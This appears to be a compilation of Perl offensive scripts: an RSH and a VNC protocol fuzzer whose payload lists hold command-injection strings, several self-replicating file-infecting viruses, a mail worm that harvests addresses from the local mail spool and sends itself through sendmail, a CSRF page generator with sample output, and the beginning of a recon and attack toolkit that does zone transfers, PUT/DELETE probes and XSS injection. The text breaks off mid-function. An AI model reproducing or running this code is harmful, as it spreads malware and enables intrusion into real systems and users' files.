$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->width($fuzz);
$vnc->login; }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = width/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->width($fuzz);
$vnc->login; }

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = height/overflow]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->height($fuzz);
$vnc->login; }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = height/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->height($fuzz);
$vnc->login; }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = height/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->height($fuzz);
$vnc->login; }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = height/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->height($fuzz);
$vnc->login; }

     print "\nFuzzing Complete. No faults? Try another server!\n\n";

exit; 

#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# RSHatter - RSH Protocol Fuzzer
# ~Just for fun~

use Net::Rsh;
use Getopt::Std;

# FUZZ DATA BEGIN HERE
@overflows = ('A' x 2200, 'A' x 4200, 'A' x 8400, 'A' x 12000, 'A' x 22000, 'A' x 52000, 'A' x 102000, 'A' x 500500,
       'A' x 1002000, 'A' x 5005000, 'A' x 12000000, '//AAAA' x 8500, '\\\AAAA' x 8500, '\0x99' x 12000);

@fmtstring = ('%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x',
              '%s%p%x%d', '%.1024d', '%.1025d', '%.2048d', '%.2049d', '%.4096d', '%.4097d',
              '%99999999999s', '%08x', '%%20n', '%%20p', '%%20s', '%%20d', '%%20x',
              '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '\0xCD' x 50, '\0xCB' x 50);

@numbers = ('0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648',
              '4294967294', '4294967295', '4294967296', '357913942', '-357913942', '536870912', '-536870912',
              '1.79769313486231E+308', '3.39519326559384E-313', '99999999999', '-99999999999', '0x100', '0x1000',
              '0x3fffffff', '0x7ffffffe', '0x7fffffff', '0x80000000', '0xffff', '0xfffffffe', '0xfffffff', '0xffffffff',
              '0x10000', '0x100000', '0x99999999', '65535', '65536', '65537', '16777215', '16777216', '16777217', '-268435455');

@miscbugs = ('test|touch /tmp/FU_ZZ_ED|test', 'test`touch /tmp/FU_ZZ_ED`test', 'test\'touch /tmp/FU_ZZ_ED\'test',
       'test;touch /tmp/FU_ZZ_ED;test', 'test&&touch /tmp/FU_ZZ_ED&&test', 'test|C:/WINDOWS/system32/calc.exe|test',
       'test`C:/WINDOWS/system32/calc.exe`test', 'test\'C:/WINDOWS/system32/calc.exe\'test', 'test;C:/WINDOWS/system32/calc.exe;test',
       'C:/WINDOWS/system32/calc.exe"', '`/bin/sh`', '%0xa', '%u000');
# FUZZ DATA END HERE

getopts('t:', \%opts);
$target = $opts{'t'};

if(!defined($target))
{
     print "\n RSHatter - RSH Protocol Fuzzer";
     print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";
     print "\n Usage: $0 -t <target>\n\n";
     exit(0);

}

     print "\n RSHatter - RSH Protocol Fuzzer";
     print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";

     print "\nFuzzing RSHd @ $target... GOOD LUCK!\n";

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/overflow]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = localuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, $fuzz, 'root', 'id'); }

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/overflow]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = remoteuser/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', $fuzz, 'id'); }

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/overflow]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = cmd/$fuzz]\n";
$rshf = Net::Rsh->new();
$rshf->rsh($target, 'root', 'root', $fuzz); }

     print "\nFuzzing Complete. RSHaattteeeerrrrr!\n\n";

exit; 

#!/usr/bin/perl
 
 open(File,$0);
 @Virus=<File>;
 close(File);
 
 foreach $FileName (<*>)
 {
  open(File, ">$FileName");
  print File @Virus;
  close (File);
 }

#!/usr/bin/perl
 open(File,$0);
 @Virus=<File>;
 close(File);
 
 foreach $FileName (<*>)
 {
  if ((-r $FileName) && (-w $FileName) && (-f $FileName))
  {
   open(File, "$FileName");
   @Temp=<File>;
   close(File);
   if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl"))
   {
    open(File, ">$FileName");
    print File @Virus;
    close (File);
   }
  }
 }

#!/usr/bin/perl
 #PerlDemo                   # NUEVO
 
 open(File,$0);
 @Virus=<File>;
 @Virus=@Virus[0...27];      # NUEVO
 close(File);
 
 foreach $FileName (<*>)
 {
  if ((-r $FileName) && (-w $FileName) && (-f $FileName))
  {
   open(File, "$FileName");
   @Temp=<File>;
   close(File);
   if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo"))  # NUEVO
   {
    if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl"))
    {
     open(File, ">$FileName");
     print File @Virus;
     print File @Temp;         # NUEVO
     close (File);
    }
   }
  }
 }

#!/usr/bin/perl #PerlDemo
 open(File,$0); @Virus=<File>; @Virus=@Virus[0...6]; close(File);
 foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
 open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo"))
 { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus;
 print File @Temp; close (File); } } } }

#!/usr/bin/perl
 #Perl Virus - Downward Travelling
 open(File,$0);
 @Virus=<File>;
 @Virus=@Virus[0...24];
 close(File);
 
 &InfectFile;                # NUEVO
 chdir('..');                # NUEVO
 &InfectFile;                # NUEVO
 
 sub InfectFile {            # NUEVO
  foreach $FileName (<*>) {
   if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
    open(File, "$FileName");
    @Temp=<File>;
    close(File);
    if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {
     if ((@Temp[0] =~ "perl",,i) or (@Temp[1] =~ "perl",,i)) {   # NUEVO
      open(File, ">$FileName");
      print File @Virus;
      print File @Temp;
      close (File);
 }}}}}

#!/usr/bin/perl
 #Perl Virus - Downward Travelling
 open(File,$0);
 @Virus=<File>;
 @Virus=@Virus[0...30];
 close(File);
 
 &InfectFile;
 if (($^O =~ "bsd") or ($^O =~ "linux") or ($^O =~ "solaris")) { $OldDir = `pwd` }       # NUEVO
 if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = `cd` }                            # NUEVO
 $DotDot = '..';                                                                         # NUEVO
 if ($^O =~ "MacOS") { $DotDot = "::" }                                                  # NUEVO
 chdir($DotDot);                                                                         # NUEVO
 &InfectFile;
 chdir($OldDir);                                                                         # NUEVO
 
 sub InfectFile {
  foreach $FileName (<*>) {
   if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
    open(File, "$FileName");
    @Temp=<File>;
    close(File);
    if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {
     if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) {
      open(File, ">$FileName");
      print File @Virus;
      print File @Temp;
      close (File);
 }}}}}

#!/usr/bin/perl
  # Perl - Get'em'all Virus
 open(File,$0);
 @Virus=<File>;
 @Virus=@Virus[0...46];
 close(File);
 
 &InfectFile;
 if ($^0 =~ "MacOS") {
  chdir('::');
  &InfectFile; }
 else { if (($^O =~ "dos") or ($^O =~ "MSWin32")) {
  $OldDir = `cd`;
  chdir('..');
  &InfectFile;
  chdir('C:\');
  &SearchUpperDirectorys;
  chdir($OldDir);}
 else {
  $OldDir = `pwd`;
  chdir("/");
  &SearchUpperDirectorys;
  chdir($OldDir);}}
 
 sub InfectFile {
  foreach $FileName (<*>) {
   if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
    open(File, "$FileName");
    @Temp=<File>;
    close(File);
    if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {
     if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) {
      open(File, ">$FileName");
      print File @Virus;
      print File @Temp;
      close (File);
 }}}}}
 
 sub SearchUpperDirectorys {
  foreach $Directory (<*>) {
   if ((-r $Directory) && (-w &Directory ) && (-d $Directory) {
    chdir ($Directory);
    &InfectFile;
    chdir ('..')
 }}}

#!/usr/bin/perl
 use File::Find;             #S El usa un modulo para encontrar archivos, esta incluido en todas las instalaciones de perl
 &virus();                   #S llamada de la sub Virus
                             #S despues de que se ejecute la sub virus vemos un pequeiƒÂ±o payload
 print "
This program is infected by the Perl virus
";
 
 sub virus                   #S empieza la parte del virus
   {
     my ( $pid, $new );      #S define variables locales
     if( $pid = fork ) { return; }
     else
       {
         open( source, $0 );        #S abre el virus
         finddepth ( \&infect, '/home/chris/test' );    #S '/home/chris/test' es donde los archivos deberian estar infectados
         sub infect
             {
             open target, "$File::Find::name";          #S abrir el archivo que queremos infectar
             $_ = <target>;                             #S leerlo en una string
             if ( /(\#!.*perl)/ )                       #S ver si tenemos #! xxxx perl en la primera linea --> chequear si es un archivo perl
             {
                 $_ = <target>;                         #S leer la segunda linea
                 if( $_ ne "use File::Find;
" )        #S si es use File::Find (usa ese modulo) no sera infectado --> marca de infeccion
                   {
                     $new = $1 . "
use File::Find;
&virus();
" . $_;  #S Escribe las primeras 2 lineas del virus en $NEW
                     while( <target> ) { $new = $new . $_; }    #S Escribe el archivo que infectamos en $NEW
                     seek(  source, 0, 0 );
                      while( <source> ne "sub virus
" ) { };   #S Lee el archivo hasta encontrar el virus
                      $new = $new . "
sub virus
";            #S escribe 'sub virus' en $NEW
                      while( <source> ) { $new = $new . $_; }   #S aiƒÂ±ade el resto del virus a $NEW
                      close  target;                        #S cierra el archivo que infectamos
                      open   target, ">$File::Find::name";  #S lo abre devuelta para escritura
                      print  target $new;                   #S escribe $NEW en el archivo
                   }
               }
             close( target );    #S cierra el archivo infectado
           }
         close( source );        #S cierra el virus
         exit( 0 );              #S sale del programa
       }
  }
 
 # a Perl virus, by paddingx
 # 08/15/1999

#!/usr/bin/perl
 open(File,$0);
 @Virus=<File>;
 @Virus=@Virus[0...29];
 close(File);
 
 foreach $FileName (</var/spool/mail/*>) {
  if ((-r $FileName) && (-f $FileName)) {
   open(File, "$FileName");
   @test1=<File>;
   close(File);
   @ReceiverList = grep /From:/, @test1;
   foreach $Receiver2 (@ReceiverList){
    @Receiver = split(/:/, $Receiver2);
    @Addy = split(/</, @Receiver[1]);
    open(File,">PerlWurm");
    print File "Hi@Addy[0]
";
    print File "take a look at this perl script
and see what is possible to do
in perl..
";
    print File " cu soon

";
    print File @Virus;
    print File ".
";
    close(File);
 
    chomp(@Addy[1]);
    chop(@Addy[1]);
    $x = `sendmail @Addy[1] < PerlWurm`;
 }}}

#!/usr/bin/perl

#By Xianur0
#uxmal666[at]gmail.com

  use HTML::Parser;
$i = 1;
$b = 1;
my $parser = HTML::Parser->new(api_version=>3,
start_h=>[\&parsear, 'tag, attr'] ,);
print "\n\n                                       Generador XSRF By Xianur0\n\n\n";

$file = $ARGV[0] || die("Use: xsrf.pl [File]\n");

open(FILE,$file) || die "No pudo abrirse: $!";
while(<FILE>) {
$html.= $_;
}
print "\nBuscando Campos....\n";
sub parsear {
     my ($tag, $attr) = @_;
if($tag =~ "form") {
$name = $attr->{"name"};
$valor = $attr->{"action"};
$metodo = $attr->{"method"};
if($metodo eq "") { $metodo = "GET"}
print "\nFormulario ".$b.": ".$name."=>".$valor."=>".$metodo."\n";
    $form{$b} = [$name, $metodo];
$b++;
}
if($tag =~ "input") {
$name = $attr->{"name"};
$valor = $attr->{"value"};
print "Campo ".$i.": ".$name."=>".$valor."\n";
    $input{$i} = [$name, $valor];
$i++;
}
}
$parser->parse($html);
print "\nTerminado Archivo Parseado!..\n\n";
print "\nEscribe el Formulario a utilizar:\n";
$forma=<STDIN>;
chop($forma);
print "Cuantos Campos(input) utilizara?\n";
$cantidad=<STDIN>;
chop($cantidad);
for($o=1;$o<=$cantidad;$o++)
{
print "Formulario $o?\n";
$inputa=<STDIN>;
chop($inputa);
print "Desea Cambiar el Value? [y/n]\n";
$respuesta=<STDIN>;
chop($respuesta);
if($respuesta eq "y") { 
print "Escriba el Nuevo Valor:\n";
$valu=<STDIN>;
chop($valu);
} else { $valu = $input{$inputa}[1]; }
$campos .='<input type="hidden" name="'.$input{$inputa}[0].'" value="'.$valu.'">';
}
print "Url Submit?\n";
$url=<STDIN>;
chop($url);
print "Generando XSRF Espere Por Favor...\n";
$xsrf = '<!-- XSRF Generator By Xianur0 -->
<form name="'.$form{$forma}[0].'" action="'.$url.'" method="'.$form{$forma}[1].'">'.$campos.'</form>
<script>document.'.$form{$forma}[0].'.submit()</script>';
open(LECTURA,">> xsrf.htm") || die "No pudo abrirse: $!";
print LECTURA $xsrf;
close(LECTURA);
print "\n\nGenerado!: xsrf.html\n\n";

bt Desktop # perl xsrf.pl google.html


                                       Generador XSRF By Xianur0



Buscando Campos....

Formulario 1: f=>/search=>GET
Campo 1: hl=>es
Campo 2: q=>
Campo 3: btnG=>Buscar con Google
Campo 4: btnI=>Voy a tener suerte
Campo 5: meta=>
Campo 6: meta=>lr=lang_es
Campo 7: meta=>cr=countryMX

Terminado Archivo Parseado!..


Escribe el Formulario a utilizar:
1
Cuantos Campos(input) utilizara?
6
Formulario 1?
1
Desea Cambiar el Value? [y/n]
y
Escriba el Nuevo Valor:
en
Formulario 2?
2
Desea Cambiar el Value? [y/n]
y
Escriba el Nuevo Valor:
Xianur0
Formulario 3?
3
Desea Cambiar el Value? [y/n]
n
Formulario 4?
5
Desea Cambiar el Value? [y/n]
n
Formulario 5?
6
Desea Cambiar el Value? [y/n]
n
Formulario 6?
7
Desea Cambiar el Value? [y/n]
n
Url Submit?
http://www.google.com/search
Generando XSRF Espere Por Favor...


Generado!: xsrf.html

<!-- XSRF Generator By Xianur0 -->
<form name="f" action="http://www.google.com/search" method="GET"><input type="hidden" name="hl" value="en"><input type="hidden" name="q" value="Xianur0"><input type="hidden" name="btnG" value="Buscar con Google"><input type="hidden" name="meta" value=""><input type="hidden" name="meta" value="lr=lang_es"><input type="hidden" name="meta" value="cr=countryMX"></form>
<script>document.f.submit()</script>

#!/usr/bin/perl


  use MIME::Base64::Perl;
  use IO::Socket::SSL;
  use Net::DNS;
  use Net::DNS::RR;
  use NetAddr::IP;
  use LWP::UserAgent;
  use Socket;
  use HTTP::Request::Common;
  use XML::Simple;
  use Getopt::Std;
  use HTML::LinkExtor;
  use URI::URL;
  use HTML::Parser;
  use Data::Dumper;
  use Term::ANSIColor qw(:constants);
    $Term::ANSIColor::AUTORESET = 1;

#Viper By Xianur0
#[email protected]

#CONFIGURACION:
#------------------------------------------
$ver = "0.3";
$useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
%whoisserver = (
         'com', 'whois.crsnic.net',
         'net', 'whois.crsnic.net',
         'edu', 'whois.crsnic.net',
         'org', 'whois.publicinterestregistry.net',
         'info', 'whois.rotld.ro',
	 'mx', 'whois.nic.mx');
$ua = LWP::UserAgent->new;
my $lib = XMLin("libs/lib.xml");
#-------------------------------------------
    print BOLD RED  "\n                                ..::Viper By Xianur0::..\n\n";
my $host = $ARGV[0];
$host = shift || die "[-]Uso: dns.pl [dominio] [opciones]\nOpciones:\n-h HTTP AttackToolKit\n-w Ataque Whois\n-d Ataque DNS\n-a Ejecuta Todo lo Anterior\n-x Testear XSS Mixto\n-t Spider y Testeo de codigo (BETA) [host] -t [path]\n-i Scanner de Paths y RSS (BETA) [host] -i [path]\n";
my $path = $ARGV[1];
my $urlp = "http://".$host.$path;
new NetAddr::IP($host) || die "Error: IP o Dominio Incorrecto!\n"; 
print "\n[-]Inicio del Scanneo: ". localtime()."\n";
        my $opt_string = 'whdtaxi';
        getopts( "$opt_string", \%opt );
        whois() if $opt{w};
        dns() if $opt{d};
        http() if $opt{h};
        todo() if $opt{a};
        xss() if $opt{x};
        info() if $opt{i};
        print "[-]Lanzando Spider!\n". spider($urlp) if $opt{t};
        print "[-]Fin del Scanneo: ". localtime(). "\n";

sub dns() {
&soa;
&mx;
&txt;
&ns;
&hinfo;
&dnsrotativo;
&any;
&zonas;
&xss();
}
sub todo() {
info();
whois();
dns();
http();
xss();
print "[-]Lanzando Spider!\n";
spider($urlp);
}

sub dnsrotativo {
print "[-]Buscando DNS Rotativos (Mediante PTR)...:\n";
my $consulta = new NetAddr::IP($host);
&consultar;
my $inicial = $ipaddr;
&consultar;
while($inicial ne $ipaddr) { &consultar; }
}

sub consultar {
my $consulta = new NetAddr::IP($host) || die "Error: IP o Dominio Incorrecto!\n";
my $resolver = Net::DNS::Resolver->new;
my $hosts = $consulta->num();
for (my $i=0; $i<$hosts; ++$i) {
$ipaddr = $consulta->addr();
if ($ipaddr) {
my $consulta = $resolver->search("$ipaddr");
if ($consulta) {
foreach my $array ($consulta->answer) {
next unless $array->type eq "PTR";
print "IP: $ipaddr\n","Host: " ,$array->ptrdname, "\n\n"; }
} }}
}

sub soa {
print "[-]Registro SOA:\n";
  my $resolver   = Net::DNS::Resolver->new;
  my $consulta = $resolver->query($host, "SOA");
  if ($consulta) {
      ($consulta->answer)[0]->print;
  }
print "\n\n";
}

sub zonas {
if($sdns[0] eq "") { $sdns[0] = $ipaddr;}
   foreach $dnsa (@sdns) {
print "[-]Intentando Ataque AXFR....: Usando: $dnsa...";
  my $consulta = Net::DNS::Resolver->new;
  $consulta->nameservers($dnsa);
  my @zonas = $consulta->axfr($host);
if(!@zonas) { print "Error!..........\n"; &detectarcomodin; } else {
  foreach $array (@zonas) {
      $dat = $array->string;
if($dat =~ "127.0.0.1") {
    print BOLD RED "\n\n[-]Vulnerable a XSS Mixto!\n         [-] $dat\n\n\n";
}
print $dat."\n";
  }     print BOLD RED  "\nVulnerado :D!\n\n";}
print "\n\n";
} }

sub ns {
  my $consulta   = Net::DNS::Resolver->new;
  my $consulta = $consulta->query($host, "NS");
  if ($consulta) {
print "[-]Servidores DNS:\n";
      foreach $array (grep { $_->type eq 'NS' } $consulta->answer) {
print $array->nsdname ."\n";
@sdns = (@sdns, $array->nsdname);
      }
  }
print "\n\n";
}

sub hinfo {
  my $consulta   = Net::DNS::Resolver->new;
  my $consulta = $consulta->query($host, "HINFO");
  if ($consulta) {
print "\n[-]Registro HINFO:\n";
      foreach $array ($consulta->answer) {
      $array->print;
      }}
print "\n\n";
}

sub mx {
  my $resolver   = Net::DNS::Resolver->new;
  my $consulta = $resolver->query($host, "MX");
  if ($consulta) {
print "\n[-]Servidores de Correo: \n";
      foreach $array ($consulta->answer) {
      $array->print; 
}
print "\n";
}
}

sub txt {
  my $resolver   = Net::DNS::Resolver->new;
  my $consulta = $resolver->query($host, "TXT");
  if ($consulta) {
print "\n[-]Registro TXT (Configuracion MX): \n";
      foreach $array ($consulta->answer) {
      $array->print; 
}
print "\n\n";
}
}

sub any {
print "[-]Obteniendo informaciiƒÂ³n Extra:\n";
  my $resolver   = Net::DNS::Resolver->new;
  my $consulta = $resolver->query($host, "ANY");
  if ($consulta) {
      foreach $array ($consulta->answer) {
      $array->print;
  }}
print "\n\n";
}

sub detectarcomodin {
my $consulta = new NetAddr::IP("dnshunterxianur0.$host");
if($consulta) { print "\nServidor Protegido contra DNS Brutes Forces...."; &brute2; } else { print RED  "No Se Detecto Comodin :).\n"; brute();}
}

sub brute() {
if($brute ne "on") {
$brute = "on";
$db = 'libs/db.txt';
my $sub;
open(SUBS, $db) || die "No existe la DB!\n";
if($host =~  "www.") {
my @dat = split("www.", $host);
$hostts = $dat[1];
}
else { $hostts = $host; }
while($sub = <SUBS>){
chomp($sub);
$remoto = "$sub.$hostts";
my $consulta = new NetAddr::IP($remoto);
if($consulta) { print "$remoto existe!\n"; $is = $consulta->addr();
if($is eq "127.0.0.1") {
    print BOLD RED "\n\n[-]Vulnerable a XSS Mixto!\n         [-] $remoto : 127.0.0.1\n\n\n";
}

&robots;}

}
close(SUBS);
}}

sub brute2 {
$url = "detectarcomodinesenlosregistroshost.$host";
  $req = HTTP::Request->new(GET => $url);
  &headers;
  $res = $ua->request($req);
	$estado = $res->code;

if ($estado != ""){
     print "Servidor Protegido Contra Brutes Forces en el Header Host del HTTP :(...\n";
}
else {&brute3; }
}

sub headers {
  $req->header('Accept' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
  $req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
  $req->header('Keep-Alive' => '300');
  $req->header('Connection' => 'keep-alive');
  $req->header('Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
}

sub brute3 {
$db = 'db.txt';
my $sub;
open(SUBS, $db) || die "No existe la DB!";
while($sub = <SUBS>){
chomp($sub);
$remoto = "$sub.$host";
my $proto = getprotobyname('tcp');
my $ipaddr = inet_aton($remoto);
my $paddr = sockaddr_in(80, $ipaddr);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
$conected = connect(SOCKET, $paddr);
close SOCKET;
  if ($conected) {
     print "$remoto Existe!\n";

  }
}
close(SUBS);
}

sub robots {
  $req = HTTP::Request->new(GET => "http://$host/robots.txt");
  &headers;
  $res = $ua->request($req);
  if ($res->is_success) {
if($res->content_type eq 'text/plain' && $res->content != "") {
     print "--------------------------------------------------------------------------------------\n".$res->content."\n--------------------------------------------------------------------------------------\n";
  }
}
}
sub http() {
use IO::Socket; 
print "\n[-]HTTP Attack ToolKit: \n\n";
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'1', );
if(!$sock) {print "No se Pudo Conectar a $host!\n"; } else {
print $sock "OPTIONS / HTTP/1.1\nHost: $host\n\n";
print "-----------------------Headers--------------------------\n";
while ($linea = <$sock>) {
if ($linea =~  "HTTP/1.") {
print "Estado De Respuesta: ".$linea;
}
if ($linea =~  /Server:/) {
print $linea;
for( @{$lib->{server}} ) {
if ($linea =~  "$_->{banner}") { print "Tipo de Servidor: $_->{nombre}\n"; }
}
}
for( @{$lib->{header}} ) {
if ($linea =~  "$_->{banner}") {
if($linea !~ "<") {
my @header = split(": ", $linea);
print "$_->{nombre}".$header[1];
}
 }
}
}
close($sock);
print "-------------------------------------------------\n\n";
#PUT
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "PUT /hacked.htm HTTP/1.1\nHost: $host\nContent-Length: 38\n\r\n\r<h1>Vulnerado por DNS Hunter 0.2</h1>\n\r\n\r";
@linea = (<$sock>);
for( @{$lib->{estado}} ) {
if ($linea[0] =~  $_->{numero}) {
print "[-]Vulnerable a PUT!!....\n      Estado de Respuesta: $_->{numero}\n\n";
 }
}
close($sock);
#TRACE
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "TRACE / HTTP/1.1\nHost: $host\n\r\n\r";
while ($linea = <$sock>) {
if ($linea =~  "message/http") {
print "[-]Vulnerable a TRACE!.....:\nCodigo XST de Demostracion:.\n------------------------------------------\n<script>\nvar xmlhttp = new XMLHttpRequest();\n//var xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');\nActiveXObject('Microsoft.XMLHTTP');\nxmlhttp.open('TRACE','http://$host/',false);\nxmlhttp.send(null);\ntext=xmlhttp.responseText;\ndocument.write(text);\n</script>\n------------------------------------------\n\n";
}
      }
close($sock);
#DELETE
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "DELETE /hacked.htm HTTP/1.1\nHost: $host\n\r\n\r";
@linea = (<$sock>);
for( @{$lib->{estado}} ) {
if ($linea[0] =~  $_->{numero}) {
print "[-]Vulnerable a DELETE!!....\n      Estado de Respuesta: $_->{numero}\n\n";
 }
}
close($sock);
}}

sub whois() {
my @hosts = split(/\./, $host);
$extencion = pop(@hosts);
$whoisserver = $whoisserver{$extencion};
if($whoisserver eq "") {print "Whois No Disponible para la Extencion: $extencion";} else {
my $sock = new IO::Socket::INET ( PeerAddr => $whoisserver, PeerPort => 43, Proto => 'tcp',  Timeout=>'10', );
print $sock "=".$host."\n";
print "\n[-]Whois ($whoisserver): \n-------------------------<Whois>----------------------------\n\n";
while ($linea = <$sock>) {
if($linea =~ $host) {
print "Server: $linea";
}
if($linea =~ "Whois Server") {
my @dato = split(": ", $linea);
chop($dato[1]);
print "Server Whois Interno: $dato[1]";
my $who = new IO::Socket::INET ( PeerAddr =>$dato[1], PeerPort => 43, Proto => 'tcp',  Timeout=>'10', );
if($who) {
print $who $host."\n";
print "\n[-]<Whois Interno de $host>\n\n"; 
print <$who>;
print "\n\n[-]</Whois Interno de $host>\n\n";
}
} else {
for( @{$lib->{whois}} ) {
if ($linea =~  "$_->{etiqueta}") {
my @dato = split(": ", $linea);
print "$_->{imprimir}".$dato[1]; }
}
}}
print "\n-------------------------</Whois>----------------------------\n\n";
}}

sub spider() {
my $hostt=shift;
if($lista{$hostt} ne $hostt) {
$lista{$hostt} = $hostt;
  my @nexo = ();
  sub tags {
     my($tag, %attr) = @_;
     return if $tag ne 'a';
     push(@nexo, values %attr);
  }
  $p = HTML::LinkExtor->new(\&tags);
  $ua = LWP::UserAgent->new;
  $ua->agent($useragent);
  $res = $ua->request(HTTP::Request->new(GET => $hostt),
                      sub {$p->parse($_[0])});
  if(!$res->is_success) { print YELLOW  "\nUser-Agent: $useragent Bloqueado!\n"; } else {
  my $base = $res->base;
  @nexo = map { $_ = url($_, $base)->abs; } @nexo;
   foreach $url (@nexo) {
my @dat = split("/", $url);
if($dat[0] eq "") { $url = "http://".$host.$url;}
  $url =~ s'='=-1 <script>alert(Fenix)</script> -1'g;
  $req = HTTP::Request->new(GET => $url);
  $req->header('Accept' => 'text/html');
  $res = $ua->request($req);
  if ($res->is_success) {
    $contenido = $res->content;
for( @{$lib->{http}} ) {
if ($contenido =~  "$_->{etiqueta}") {
print "\n\nBug Detectado: $_->{imprimir}".$url."\n\n"; }
}
  }
spider($url);
}
}
}}

sub xss(){
$xssmixto = new NetAddr::IP('localhost.'.$host) || exit;
$ipv = $xssmixto->addr();
if($ipv eq "127.0.0.1") {
print BOLD RED  "\n[-]Vulnerable a XSS Mixto!\n[-]localhost.$host: $ipv\n\n\n";
}
}


sub info() {
    my $lib = XMLin("libs/lib.xml");
    $Term::ANSIColor::AUTORESET = 1;
    $ua = LWP::UserAgent->new;
    my $useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
    my $web = $urlp;
my $parser = HTML::Parser->new(api_version=>3,
start_h=>[\&parsear, 'tag, attr'] ,);
$useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";

&tempse;
&cms;

sub tempse {
print RED "\nLoading Dictionary....\n";
my $temp;
